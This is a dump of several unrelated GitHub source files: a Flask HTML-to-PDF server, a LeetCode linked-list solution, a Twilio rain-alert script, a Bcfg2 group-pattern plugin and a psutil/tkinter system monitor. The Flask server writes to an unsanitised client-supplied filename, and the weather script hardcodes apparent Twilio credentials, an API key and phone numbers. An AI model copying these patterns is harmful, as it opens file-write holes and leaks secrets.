{}\n chrome_options.experimental_options[\"prefs\"] = chrome_prefs\n chrome_prefs[\"profile.default_content_settings\"] = {\"images\": 2}\n return chrome_options\n\ndef send_devtools(driver, cmd, params={}):\n resource = \"/session/%s/chromium/send_command_and_get_result\" % driver.session_id\n url = driver.command_executor._url + resource\n body = json.dumps({'cmd': cmd, 'params': params})\n response = driver.command_executor._request('POST', url, body)\n if response.get('status'):\n raise Exception(response.get('value'))\n return response.get('value')\n\n\ndef get_pdf_from_html(html_content, print_options={}):\n driver = webdriver.Chrome(options=set_chrome_options())\n\n driver.get(\"data:text/html;charset=utf-8,\" + html_content)\n\n calculated_print_options = {\n 'landscape': False,\n 'displayHeaderFooter': False,\n 'printBackground': True,\n 'preferCSSPageSize': True,\n }\n calculated_print_options.update(print_options)\n result = send_devtools(driver, \"Page.printToPDF\", calculated_print_options)\n driver.quit()\n\n return base64.b64decode(result['data'])\n\n\ndef html2pdf(html):\n result = get_pdf_from_html(html)\n return result\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"

HTML 2 PDF Server\n\nuse post request at /render to render your HTML into a pdf file. As Parameters you need to specify 'html' with the html string and 'filename' like invoice.pdf\"\n\n\n@app.route('/render', methods=['POST'])\ndef render():\n\n # get parameters from request\n html = request.form[\"html\"]\n filename = request.form[\"filename\"]\n\n # print html for debug\n print(html)\n\n # render html\n print(\"rendering \"+filename+\"...\")\n pdf = html2pdf(str(html))\n # store pdf file\n print(\"storing \"+filename+\"...\")\n with open(filename, 'wb') as file:\n file.write(pdf)\n\n # return stored file\n print(\"returning \"+filename+\"...\")\n\n @after_this_request\n def remove_file(response):\n print(\"removing sent file...\")\n try:\n os.remove(filename)\n except Exception as error:\n app.logger.error(\"Error removing or closing downloaded file handle\", error)\n return response\n return send_file(filename)\n\n\napp.run(host='0.0.0.0')\n","repo_name":"patrickbollmann/html2pdf-server","sub_path":"html2pdf-server.py","file_name":"html2pdf-server.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9039858257","text":"'''\nDescription: \nAuthor: coderwangson\nDate: 2020-09-13 21:56:38\nFilePath: \\leetcode\\24_两两交换链表中的节点\\两两交换链表中的节点.py\nLastEditTime: 2020-10-13 16:37:13\n'''\n\"\"\"\nCreated on 2019/3/5 21:04\n@File:两两交换链表中的节点.py\n@author: coderwangson\n\"\"\"\n\"#coding=utf-8\"\n\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def swapPairs(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n #Think of it as a single traversal, where at each step we just swap the two nodes that follow the current node\n h = ListNode(-1)\n h.next = head\n pre = h\n # While there are two more nodes after the current one\n while pre.next and pre.next.next:\n p = pre.next\n q = p.next\n \n pre.next = q\n p.next = q.next\n q.next = p\n\n pre = p\n\n return h.next\n\n\n","repo_name":"Elroborn/LeetCode","sub_path":"24_两两交换链表中的节点/两两交换链表中的节点.py","file_name":"两两交换链表中的节点.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"71404153963","text":"import requests\nfrom twilio.rest import Client\n\n\n# \"lat\": 13.046396,\n# \"lon\": 77.723328,\n\nAPI = \"6940d199dd16f53e04bbc0f5896b6c44\"\naccount_sid = \"ACfb9a6b8aa9e4675b0d2abd5179828bb6\"\nauth_token = \"f4e0af510b8c63e2afd1ec3d042aa0c0\"\n\nparameters = {\n \"lat\": -12.462320,\n \"lon\": 130.840942,\n \"appid\": API,\n \"exclude\": \"current,minutely,daily\"\n}\n\n\nresponse = requests.get(\"https://api.openweathermap.org/data/2.5/onecall\", params=parameters)\nresponse.raise_for_status()\n\ndata = response.json()\nhourly_data = data[\"hourly\"]\n\n\nb = hourly_data[0][\"weather\"][0][\"id\"]\n\nweather_slice = data[\"hourly\"][:12]\n\nwill_rain = False\n\nfor x in weather_slice:\n code = x[\"weather\"][0][\"id\"]\n if code < 700:\n will_rain = True\n\nif will_rain:\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body=\"Bring Umbrella\",\n from_='+16165800849',\n to=\"+9189718 18410\"\n )\n\n print(\"Message Sent\")\n\n","repo_name":"aruneshkumar324/100-Days-Python","sub_path":"35-Day/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28380027519","text":"import lxml.etree\nimport re\n\nimport Bcfg2.Server.Plugin\n\n\nclass PackedDigitRange(object):\n def __init__(self, digit_range):\n self.sparse = list()\n self.ranges = list()\n for item in 
digit_range.split(','):\n if '-' in item:\n self.ranges.append(tuple([int(x) for x in item.split('-')]))\n else:\n self.sparse.append(int(item))\n\n def includes(self, other):\n iother = int(other)\n if iother in self.sparse:\n return True\n for (start, end) in self.ranges:\n if iother in range(start, end + 1):\n return True\n return False\n\n\nclass PatternMap(object):\n range_finder = '\\\\[\\\\[[\\d\\-,]+\\\\]\\\\]'\n\n def __init__(self, pattern, rangestr, groups):\n self.pattern = pattern\n self.rangestr = rangestr\n self.groups = groups\n if pattern != None:\n self.re = re.compile(pattern)\n self.process = self.process_re\n elif rangestr != None:\n self.process = self.process_range\n self.re = re.compile('^' + re.subn(self.range_finder, '(\\d+)',\n rangestr)[0])\n dmatcher = re.compile(re.subn(self.range_finder,\n '\\\\[\\\\[([\\d\\-,]+)\\\\]\\\\]',\n rangestr)[0])\n self.dranges = [PackedDigitRange(x) for x in dmatcher.match(rangestr).groups()]\n else:\n raise Exception\n\n def process_range(self, name):\n match = self.re.match(name)\n if not match:\n return None\n digits = match.groups()\n for i in range(len(digits)):\n if not self.dranges[i].includes(digits[i]):\n return None\n return self.groups\n\n def process_re(self, name):\n match = self.re.match(name)\n if not match:\n return None\n ret = list()\n sub = match.groups()\n for group in self.groups:\n newg = group\n for idx in range(len(sub)):\n newg = newg.replace('$%s' % (idx + 1), sub[idx])\n ret.append(newg)\n return ret\n\n\nclass PatternFile(Bcfg2.Server.Plugin.SingleXMLFileBacked):\n __identifier__ = None\n\n def __init__(self, filename, fam):\n Bcfg2.Server.Plugin.SingleXMLFileBacked.__init__(self, filename, fam)\n self.patterns = []\n\n def Index(self):\n Bcfg2.Server.Plugin.SingleXMLFileBacked.Index(self)\n self.patterns = []\n for entry in self.xdata.xpath('//GroupPattern'):\n try:\n groups = [g.text for g in entry.findall('Group')]\n for pat_ent in entry.findall('NamePattern'):\n pat = pat_ent.text\n self.patterns.append(PatternMap(pat, None, groups))\n for range_ent in entry.findall('NameRange'):\n rng = range_ent.text\n self.patterns.append(PatternMap(None, rng, groups))\n except:\n self.logger.error(\"GroupPatterns: Failed to initialize pattern \"\n \"%s\" % entry.get('pattern'))\n\n def process_patterns(self, hostname):\n ret = []\n for pattern in self.patterns:\n try:\n gn = pattern.process(hostname)\n if gn is not None:\n ret.extend(gn)\n except:\n self.logger.error(\"GroupPatterns: Failed to process pattern %s \"\n \"for %s\" % (pattern.pattern, hostname),\n exc_info=1)\n return ret\n\n\nclass GroupPatterns(Bcfg2.Server.Plugin.Plugin,\n Bcfg2.Server.Plugin.Connector):\n name = \"GroupPatterns\"\n experimental = True\n\n def __init__(self, core, datastore):\n Bcfg2.Server.Plugin.Plugin.__init__(self, core, datastore)\n Bcfg2.Server.Plugin.Connector.__init__(self)\n self.config = PatternFile(self.data + '/config.xml',\n core.fam)\n\n def get_additional_groups(self, metadata):\n return self.config.process_patterns(metadata.hostname)\n","repo_name":"solj/bcfg2-old","sub_path":"src/lib/Server/Plugins/GroupPatterns.py","file_name":"GroupPatterns.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"2095948823","text":"import platform\nimport psutil\nimport datetime\nimport sys\nimport os\nfrom datetime import date,datetime\nimport matplotlib.pyplot as plt\nimport tkinter as tk\nfrom tkinter import ttk\nfrom PIL 
import ImageTk, Image\nimport matplotlib\nfrom PIL.ImageTk import PhotoImage\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom matplotlib.figure import Figure\nimport matplotlib.animation as animation\nfrom matplotlib import style\nmatplotlib.use(\"TkAgg\")\n\nLARGE_FONT = (\"Verdana\", 12)\nNORMAL_FONT = (\"Verdana\", 10)\nstyle.use(\"dark_background\")\n\n\nTURN = 0\ndef increment():\n \"\"\"\n Function that is basically incrementing\n the clock (TURN in our case) that says\n how many seconds have passed since the\n launch of the app\n :return:\n \"\"\"\n global TURN\n TURN = TURN+1\n\n\ndef get_size(bytes, suffix=\"B\"):\n \"\"\"\n Scale bytes to its proper format\n Keyword arguments:\n bytes -- bytes that we want to convert to Kb,Mb,Gb,Tb,Pb\n suffix -- what to add at the end of conversion not just K,M,G,T,P (default B)\n e.g:\n 1253656 => '1.20MB'\n 1253656678 => '1.17GB'\n \"\"\"\n factor = 1024\n for unit in [\"\", \"K\", \"M\", \"G\", \"T\", \"P\"]:\n if bytes < factor:\n return f\"{bytes:.2f}{unit}{suffix}\"\n bytes /= factor\n\n\ndef system_info():\n \"\"\"\n Function that gathers the information about the current system\n :return:\n \"\"\"\n uname = platform.uname()\n systemN = uname.system\n nodeN = uname.node\n releaseN = uname.release\n versionN = uname.version\n machineN = uname.machine\n processorN = uname.processor\n # Boot Time\n bootTimeTstmp = psutil.boot_time()\n bt = datetime.fromtimestamp(bootTimeTstmp)\n\n\ndef clean_cache():\n \"\"\"\n Function called everytime we start the app to clear\n the contents of every SampleData file\n :return:\n \"\"\"\n fileCPU = open(\"SampleDataCPU.txt\", \"w\")\n fileMem = open(\"SampleDataMemory.txt\", \"w\")\n fileSwap = open(\"SampleDataSwap.txt\", \"w\")\n fileNet = open(\"SampleDataNetwork.txt\", \"w\")\n fileDisk = open(\"SampleDataDisk.txt\", \"w\")\n\n\ncores_init={}\ncore_percentage_init = psutil.cpu_percent()\ndef cpu_info():\n \"\"\"\n Function that gathers the info about the cpu\n and storing the percentage in the SampleData\n :return:\n \"\"\"\n # prepare the file with the data\n f = open(\"SampleDataCPU.txt\", \"a\")\n # number of cores\n # cpuCountP = psutil.cpu_count(logical=False) #Physical number of cores\n # cpuCountT = psutil.cpu_count(logical=True) #Total number of cores\n\n # CPU frequencies\n # cpufreq = psutil.cpu_freq()\n # freqMax = cpufreq.max\n # freqMin = cpufreq.min\n # freqCurr = cpufreq.current\n\n # CPU usage\n # print(\"CPU Usage Per Core:\")\n cores = {}\n i = TURN + 1\n # if i % 120 == 0:\n # clean_cache()\n totalCpup= psutil.cpu_percent()\n f.write(str(i)+\",\"+str(totalCpup)+\"\\n\")\n if TURN == 0:\n cores_init = cores\n # for j, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):\n # cores[j] = percentage\n # print(f\"Core {j}: {cores[j]}%\")\n\n\nmem_init = psutil.virtual_memory()\nswap_init = psutil.swap_memory()\ndef memory_info():\n \"\"\"\n Function that gathers the info about the memory usage\n and swapt memory usage\n Storing it in the SampleData\n :return:\n \"\"\"\n # prepare the file with the data\n fileMem = open(\"SampleDataMemory.txt\", \"a\")\n i = TURN + 1\n # get the memory details\n svmem = psutil.virtual_memory()\n # totalMem = get_size(svmem.total)\n # availableMem = get_size(svmem.available)\n # usedMem = get_size(svmem.used)\n percentageMem = svmem.percent\n fileMem.write(str(i) + \",\" + str(percentageMem) + \"\\n\")\n\n # prepare the file with the data\n fileSwap = open(\"SampleDataSwap.txt\", \"a\")\n # get the 
swap = psutil.swap_memory()\n    # totalSwap = get_size(swap.total)\n    # freeSwap = get_size(swap.free)\n    # usedSwap = get_size(swap.used)\n    percentageSwap = swap.percent\n    fileSwap.write(str(i) + \",\" + str(percentageSwap) + \"\\n\")\n    fileSwap.close()\n\n\npartitions_init = psutil.disk_partitions()\ndef disk_info():\n    \"\"\"\n    Sample the disk usage of every partition in the\n    system and append it to the SampleData file\n    :return:\n    \"\"\"\n    fileDisk = open(\"SampleDataDisk.txt\", \"a\")\n    i = TURN + 1\n    # get all disk partitions\n    partitions = psutil.disk_partitions()\n    for partition in partitions:\n        partitionDevice = partition.device\n        partitionMountPoint = partition.mountpoint\n        partitionFstype = partition.fstype\n        try:\n            partition_usage = psutil.disk_usage(partition.mountpoint)\n        except PermissionError:\n            # raised when the disk isn't ready; skip this partition\n            continue\n        sizeDiskT = get_size(partition_usage.total)\n        sizeDiskU = get_size(partition_usage.used)\n        sizeDiskF = get_size(partition_usage.free)\n        sizeDiskP = partition_usage.percent\n        fileDisk.write(str(i) + \",\" + str(partitionDevice) + \",\" + str(sizeDiskU) + \",\" + str(sizeDiskF) + \",\" + str(sizeDiskP) + \"%\" + \"\\n\")\n    fileDisk.close()\n\n    # get IO statistics since boot\n    disk_io = psutil.disk_io_counters()\n    totalReadDisk = get_size(disk_io.read_bytes)\n    totalWriteDisk = get_size(disk_io.write_bytes)\n\n\nnet_io_init = psutil.net_io_counters()\ndef network_info():\n    \"\"\"\n    Sample the network usage and append\n    it to the SampleData file\n    :return:\n    \"\"\"\n    # prepare the file with the data\n    fileNet = open(\"SampleDataNetwork.txt\", \"a\")\n    i = TURN + 1\n\n    # get IO statistics since boot\n    net_io = psutil.net_io_counters()\n    totalBytesS = get_size(net_io.bytes_sent)\n    totalBytesR = get_size(net_io.bytes_recv)\n    fileNet.write(str(i) + \",\" + str(totalBytesS) + \",\" + str(totalBytesR) + \"\\n\")\n    fileNet.close()\n\n\nclean_cache()\nsystem_info()\ncpu_info()\nmemory_info()\ndisk_info()\nnetwork_info()\n\n\nf = plt.figure(constrained_layout=True)\ngs = f.add_gridspec(3, 3)\n# layout: CPU spans the whole top row, memory takes most of the middle row,\n# swap sits bottom-left and the two network plots fill the right-hand side\ncpuPlot = f.add_subplot(gs[0, :])\nmemPlot = f.add_subplot(gs[1, :-1])\nswapPlot = f.add_subplot(gs[-1, 0])\nnetPlotS = f.add_subplot(gs[1:, -1])\nnetPlotR = f.add_subplot(gs[-1, -2])\n\n\ndef animate(i):\n    \"\"\"\n    Frame callback that keeps the plots live.\n    On every call it appends fresh samples to the SampleData files,\n    advances the app clock with increment(), then re-reads every\n    file and redraws the corresponding plot\n    Keyword arguments:\n    i -- frame counter supplied by FuncAnimation\n    :return:\n    \"\"\"\n    increment()\n    cpu_info()\n    memory_info()\n    network_info()\n    disk_info()\n\n    pullDataCPU = open(\"SampleDataCPU.txt\", \"r\").read()\n    dataListCPU = pullDataCPU.split('\\n')\n    xListCPU = []\n    yListCPU = []\n    for eachLine in dataListCPU:\n        if len(eachLine) > 1:\n            xcpu, ycpu = eachLine.split(',')\n            xListCPU.append(int(xcpu))\n            yListCPU.append(float(ycpu))\n    cpuPlot.clear()\n    cpuPlot.plot(xListCPU, yListCPU)\n\n\n    pullDataMem = open(\"SampleDataMemory.txt\", \"r\").read()\n    dataListMem = pullDataMem.split('\\n')\n    xListMem = []\n    yListMem = []\n    for eachLine in dataListMem:\n        if len(eachLine) > 1:\n            xmem, ymem = eachLine.split(',')\n            xListMem.append(int(xmem))\n            yListMem.append(float(ymem))\n    memPlot.clear()\n    memPlot.plot(xListMem, yListMem)\n\n    pullDataSwap = open(\"SampleDataSwap.txt\", \"r\").read()\n    
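# the whole sample file is re-read and re-parsed on every frame; fine for\n    # short sessions, though a rolling buffer would scale better on long runs\n    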
dataListSwap = pullDataSwap.split('\\n')\n    xListSwap = []\n    yListSwap = []\n    for eachLine in dataListSwap:\n        if len(eachLine) > 1:\n            xswap, yswap = eachLine.split(',')\n            xListSwap.append(int(xswap))\n            yListSwap.append(float(yswap))\n    swapPlot.clear()\n    swapPlot.plot(xListSwap, yListSwap)\n\n\n    pullDataNet = open(\"SampleDataNetwork.txt\", \"r\").read()\n    dataListNet = pullDataNet.split('\\n')\n    xListNet = []\n    yListNetS = []\n    yListNetR = []\n    for eachLine in dataListNet:\n        if len(eachLine) > 1:\n            xnet, ynets, ynetr = eachLine.split(',')\n            xListNet.append(int(xnet))\n            # strip the two-character unit suffix that get_size() appended\n            yListNetS.append(ynets[:-2])\n            yListNetR.append(ynetr[:-2])\n\n    netPlotR.clear()\n    netPlotS.clear()\n    netPlotR.plot(xListNet, yListNetR)\n    netPlotS.plot(xListNet, yListNetS)\n\n    # Set the title and the axis labels of every plot\n    cpuPlot.set_title('CPU Percentage')\n    cpuPlot.set_xlabel('Time(s)')\n    cpuPlot.set_ylabel('Usage(%)')\n    memPlot.set_title('Memory Percentage')\n    memPlot.set_xlabel('Time(s)')\n    memPlot.set_ylabel('Usage(%)')\n    swapPlot.set_title('Swap Mem Usage')\n    swapPlot.set_xlabel('Time(s)')\n    swapPlot.set_ylabel('Usage(%)')\n    netPlotS.set_title('Network Sent')\n    netPlotS.set_xlabel('Time(s)')\n    netPlotS.set_ylabel('Size sent')\n    netPlotR.set_title('Network Received')\n    netPlotR.set_xlabel('Time(s)')\n    netPlotR.set_ylabel('Size received')\n\n\ndef save_chart():\n    \"\"\"\n    Render the current per-partition disk usage as a pie chart\n    and save it to pie_chart.jpg\n    :return:\n    \"\"\"\n    partitionsName = []\n    partitionsSize = []\n    totalSizeGB = 0\n    partitions = psutil.disk_partitions()\n    for partition in partitions:\n        try:\n            partition_usage = psutil.disk_usage(partition.mountpoint)\n        except PermissionError:\n            # raised when the disk isn't ready; skip this partition\n            continue\n        # only record partitions we could actually query, so the name\n        # and size lists stay the same length\n        partitionsName.append(partition.device)\n        sizeDiskT = get_size(partition_usage.total)\n        sizeDiskU = get_size(partition_usage.used)\n        partitionsSize.append(sizeDiskU)\n        totalSizeGB += float(partition_usage.total)\n\n    totalSize = float(get_size(totalSizeGB)[:-2])\n    partitionsS = []\n    used = 0\n    for partition in partitionsSize:\n        partitionsS.append(float(partition[:-2]))\n    for j in range(0, len(partitionsS)):\n        used += partitionsS[j]\n    partitionsName.append(\"Free Space\")\n    partitionsS.append(totalSize - used)\n    # pull the last wedge (the free space) slightly out of the pie,\n    # however many partitions there are\n    explode = tuple([0] * (len(partitionsS) - 1) + [0.1])\n    fig1, ax1 = plt.subplots()\n    colors = ['#ff9999', '#66b3ff', '#99ff99', '#ffcc99']\n    patches, texts, autotexts = ax1.pie(partitionsS, explode=explode, labels=partitionsName, colors=colors,\n                                        autopct='%1.1f%%',\n                                        shadow=False, startangle=90)\n    for text in texts:\n        text.set_color('grey')\n    for autotext in autotexts:\n        autotext.set_color('grey')\n    ax1.axis('equal')\n    plt.tight_layout()\n    fig1.savefig('pie_chart.jpg', dpi=300, transparent=True)\n    
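# note: JPEG has no alpha channel, so transparent=True has no visible effect\n    # here; saving to a .png target instead would preserve the transparency\n\n\n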
def history(controller):\n    \"\"\"\n    Append a snapshot of the system state to history.txt: the values\n    recorded when the application started and the values at the moment\n    the user presses the \"Save data & Exit\" button\n    :param controller: used for returning the user to the StartPage\n    :return:\n    \"\"\"\n    end = datetime.now()\n    ani.event_source.stop()\n    save_chart()\n    # open the history file, creating it if it does not exist yet\n    f = open(\"history.txt\", \"a\")\n    # -----------------System-----------------\n    uname = platform.uname()\n    bootTimeTstmp = psutil.boot_time()\n    bt = datetime.fromtimestamp(bootTimeTstmp)\n    f.write(\"---------System Info---------\\n\")\n    f.write(f\"System: {uname.system}\\n\")\n    f.write(f\"Node Name: {uname.node}\\n\")\n    f.write(f\"Release: {uname.release}\\n\")\n    f.write(f\"Version: {uname.version}\\n\")\n    f.write(f\"Machine: {uname.machine}\\n\")\n    f.write(f\"Processor: {uname.processor}\\n\")\n    f.write(f\"Boot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}\\n\")\n    # -----------------System-----------------\n    # ----------------- CPU -----------------\n    cpuCountP = psutil.cpu_count(logical=False)  # Physical number of cores\n    cpuCountT = psutil.cpu_count(logical=True)  # Total number of cores\n    # CPU frequencies\n    cpufreq = psutil.cpu_freq()\n    freqMax = cpufreq.max\n    freqMin = cpufreq.min\n    freqCurr = cpufreq.current\n    f.write(\"---------CPU Info---------\\n\")\n    f.write(f\"Number of physical cores: {cpuCountP}\\n\")\n    f.write(f\"Total number of cores: {cpuCountT}\\n\")\n    f.write(f\"Maximum frequency: {freqMax}\\n\")\n    f.write(f\"Minimum frequency: {freqMin}\\n\")\n    f.write(f\"Current frequency: {freqCurr}\\n\")\n    # ----------------- CPU -----------------\n    # append the data from the start and the end of the execution\n    f.write(\"\\n\")\n    f.write(f\"--------- {start.year}/{start.month}/{start.day} {start.hour}:{start.minute}:{start.second} ---------\\n\")\n\n    # -------CPU--------\n    f.write(\"\\n\")\n    f.write(f\"####CPU####\\n\")\n    # NOTE: this per-core sample is actually taken now, at save time; only\n    # core_percentage_init below is a true start-of-run value\n    for j, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):\n        cores_init[j] = percentage\n        f.write(f\"Core {j}: {cores_init[j]}%\\n\")\n    f.write(f\"Total core percentage start: {core_percentage_init}%\\n\")\n    # -------CPU--------\n\n    # -------Memory-------\n    f.write(\"\\n\")\n    f.write(f\"####MEMORY####\\n\")\n    totalMem = get_size(mem_init.total)\n    availableMem = get_size(mem_init.available)\n    usedMem = get_size(mem_init.used)\n    percentageMem = mem_init.percent\n    f.write(f\"Total memory: {totalMem}\\n\")\n    f.write(f\"Available memory: {availableMem}\\n\")\n    f.write(f\"Used memory: {usedMem}\\n\")\n    f.write(f\"Percentage used memory start: {percentageMem}\\n\")\n    f.write(f\"####SWAP MEMORY####\\n\")\n    totalSwap = get_size(swap_init.total)\n    freeSwap = get_size(swap_init.free)\n    usedSwap = get_size(swap_init.used)\n    f.write(f\"Total swap memory: {totalSwap}\\n\")\n    f.write(f\"Available swap memory: {freeSwap}\\n\")\n    f.write(f\"Used swap memory: {usedSwap}\\n\")\n    f.write(f\"Percentage used swap memory: {swap_init.percent}\\n\")\n    # -------Memory-------\n\n    # -------Disk-------\n    f.write(\"\\n\")\n    f.write(f\"####DISK SPACE####\\n\")\n    f.write(f\"Partitions and Usage:\\n\")\n    # use the partition list captured at import time, not a fresh query\n    for partition in partitions_init:\n        partitionDevice = partition.device\n        partitionMountPoint = partition.mountpoint\n        partitionFstype = partition.fstype\n        f.write(f\"=== Device: {partitionDevice} ===\\n\")\n        f.write(f\" Mountpoint: {partitionMountPoint}\\n\")\n        f.write(f\" File system type: {partitionFstype}\\n\")\n        try:\n            partition_usage = psutil.disk_usage(partition.mountpoint)\n        except PermissionError:\n            # raised when the disk isn't ready; skip this partition\n            continue\n        sizeDiskT = get_size(partition_usage.total)\n        sizeDiskU = get_size(partition_usage.used)\n        sizeDiskF = get_size(partition_usage.free)\n        sizeDiskP = partition_usage.percent\n        f.write(f\" Total Size: {sizeDiskT}\\n\")\n        f.write(f\" Used: {sizeDiskU}\\n\")\n        f.write(f\" Free: {sizeDiskF}\\n\")\n        f.write(f\" Percentage: {sizeDiskP}%\\n\")\n    disk_io = psutil.disk_io_counters()\n    totalReadDisk = get_size(disk_io.read_bytes)\n    totalWriteDisk = get_size(disk_io.write_bytes)\n    f.write(f\"Total read: {totalReadDisk}\\n\")\n    f.write(f\"Total write: {totalWriteDisk}\\n\")\n    # -------Disk-------\n\n    
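# disk_io counters are cumulative since boot, so the start and end\n    # sections written here can be diffed to get per-session read/write totals\n\n    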
# -------Network-------\n    f.write(\"\\n\")\n    f.write(f\"####NETWORK USAGE####\\n\")\n    totalBytesS = get_size(net_io_init.bytes_sent)\n    totalBytesR = get_size(net_io_init.bytes_recv)\n    f.write(f\"Total bytes sent: {totalBytesS}\\n\")\n    f.write(f\"Total bytes received: {totalBytesR}\\n\")\n    # -------Network-------\n    f.write(\"\\n\")\n\n    # ------------------------------------------------------------------------------------------------------------------\n    f.write(f\"--------- {end.year}/{end.month}/{end.day} {end.hour}:{end.minute}:{end.second} ---------\\n\")\n    # -------CPU--------\n    f.write(\"\\n\")\n    f.write(f\"####CPU####\\n\")\n    cores = {}\n    totalCpup = psutil.cpu_percent()\n    for j, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):\n        cores[j] = percentage\n        f.write(f\"Core {j}: {cores[j]}%\\n\")\n    f.write(f\"Total core percentage end: {totalCpup}%\\n\")\n    # -------CPU--------\n\n    # -------Memory-------\n    f.write(\"\\n\")\n    f.write(f\"####MEMORY####\\n\")\n    svmem = psutil.virtual_memory()\n    totalMem = get_size(svmem.total)\n    availableMem = get_size(svmem.available)\n    usedMem = get_size(svmem.used)\n    percentageMem = svmem.percent\n    f.write(f\"Total memory: {totalMem}\\n\")\n    f.write(f\"Available memory: {availableMem}\\n\")\n    f.write(f\"Used memory: {usedMem}\\n\")\n    f.write(f\"Percentage used memory end: {percentageMem}\\n\")\n    f.write(f\"####SWAP MEMORY####\\n\")\n    swap = psutil.swap_memory()\n    totalSwap = get_size(swap.total)\n    freeSwap = get_size(swap.free)\n    usedSwap = get_size(swap.used)\n    f.write(f\"Total swap memory: {totalSwap}\\n\")\n    f.write(f\"Available swap memory: {freeSwap}\\n\")\n    f.write(f\"Used swap memory: {usedSwap}\\n\")\n    f.write(f\"Percentage used swap memory: {swap.percent}\\n\")\n    # -------Memory-------\n\n    # -------Disk-------\n    f.write(\"\\n\")\n    f.write(f\"####DISK SPACE####\\n\")\n    f.write(f\"Partitions and Usage:\\n\")\n    partitions = psutil.disk_partitions()\n    for partition in partitions:\n        partitionDevice = partition.device\n        partitionMountPoint = partition.mountpoint\n        partitionFstype = partition.fstype\n        f.write(f\"=== Device: {partitionDevice} ===\\n\")\n        f.write(f\" Mountpoint: {partitionMountPoint}\\n\")\n        f.write(f\" File system type: {partitionFstype}\\n\")\n        try:\n            partition_usage = psutil.disk_usage(partition.mountpoint)\n        except PermissionError:\n            # raised when the disk isn't ready; skip this partition\n            continue\n        sizeDiskT = get_size(partition_usage.total)\n        sizeDiskU = get_size(partition_usage.used)\n        sizeDiskF = get_size(partition_usage.free)\n        sizeDiskP = partition_usage.percent\n        f.write(f\" Total Size: {sizeDiskT}\\n\")\n        f.write(f\" Used: {sizeDiskU}\\n\")\n        f.write(f\" Free: {sizeDiskF}\\n\")\n        f.write(f\" Percentage: {sizeDiskP}%\\n\")\n    disk_io = psutil.disk_io_counters()\n    totalReadDisk = get_size(disk_io.read_bytes)\n    totalWriteDisk = get_size(disk_io.write_bytes)\n    f.write(f\"Total read: {totalReadDisk}\\n\")\n    f.write(f\"Total write: {totalWriteDisk}\\n\")\n    # -------Disk-------\n\n    # -------Network-------\n    f.write(\"\\n\")\n    f.write(f\"####NETWORK USAGE####\\n\")\n    net_io = psutil.net_io_counters()\n    totalBytesS = get_size(net_io.bytes_sent)\n    totalBytesR = get_size(net_io.bytes_recv)\n    f.write(f\"Total bytes sent: {totalBytesS}\\n\")\n    f.write(f\"Total bytes received: {totalBytesR}\\n\")\n    # -------Network-------\n\n    f.write(f\"######################################################################################################\")\n    f.write(\"\\n\\n\\n\")\n    f.close()\n    controller.show_frame(StartPage)\n\n\nstart = 
datetime.now()\n\n\ndef stop_animation():\n \"\"\"\n Stops the current plot animation that is running\n \"\"\"\n ani.event_source.stop()\n\n\ndef restart_program():\n \"\"\"\n Restarts the current program.\n \"\"\"\n python = sys.executable\n os.execl(python, python, * sys.argv)\n\n\nclass GuiResourceMonitor(tk.Tk):\n \"\"\"\n Main class used for configuring tkinter and its pages\n \"\"\"\n def __init__(self):\n\n tk.Tk.__init__(self)\n container = tk.Frame(self)\n\n container.pack(side=\"top\", fill=\"both\", expand=True)\n\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n\n for F in (StartPage, PageOne):\n\n frame = F(container, self)\n\n self.frames[F] = frame\n\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(StartPage)\n\n def show_frame(self, cont):\n frame = self.frames[cont]\n frame.tkraise()\n\n\nclass StartPage(tk.Frame):\n \"\"\"\n First page with the static info about the system\n \"\"\"\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n label = ttk.Label(self, text=\"Resource Monitor\", font=LARGE_FONT)\n label.pack(pady=10, padx=10)\n\n button1 = ttk.Button(self, text=\"See the live data\", command=lambda: controller.show_frame(PageOne))\n button1.pack(side=tk.BOTTOM,padx=20,pady=20)\n # -----------------System-----------------\n uname = platform.uname()\n bootTimeTstmp = psutil.boot_time()\n bt = datetime.fromtimestamp(bootTimeTstmp)\n # ----------------- CPU -----------------\n cpuCountP = psutil.cpu_count(logical=False) # Physical number of cores\n cpuCountT = psutil.cpu_count(logical=True) # Total number of cores\n # CPU frequencies\n cpufreq = psutil.cpu_freq()\n freqMax = cpufreq.max\n freqMin = cpufreq.min\n freqCurr = cpufreq.current\n\n label1 = ttk.Label(self, text=\"---------System Info---------\\n\"\n + \"System: \" + str(uname.system)+\"\\n\"\n + \"Node Name: \"+str(uname.node)+\"\\n\"\n + \"Release: \"+str(uname.release)+\"\\n\"\n + \"Version: \"+str(uname.version)+\"\\n\"\n + \"Machine: \"+str(uname.machine)+\"\\n\"\n + \"Processor: \"+str(uname.processor)+\"\\n\"\n + \"---------CPU Info---------\\n\"\n + \"Number of physical cores:\"+str(cpuCountP)+\"\\n\"\n + \"Total number of cores:\"+str(cpuCountT)+\"\\n\"\n + \"Maximum frequency:\"+str(freqMax)+\"\\n\"\n + \"Minimum frequency:\"+str(freqMin)+\"\\n\"\n + \"Current frequency:\"+str(freqCurr)+\"\\n\", font=LARGE_FONT)\n label1.pack()\n\n # load = Image.open(\"pie_chart.jpg\")\n # render = ImageTk.PhotoImage(load)\n # img = tk.Label(self, 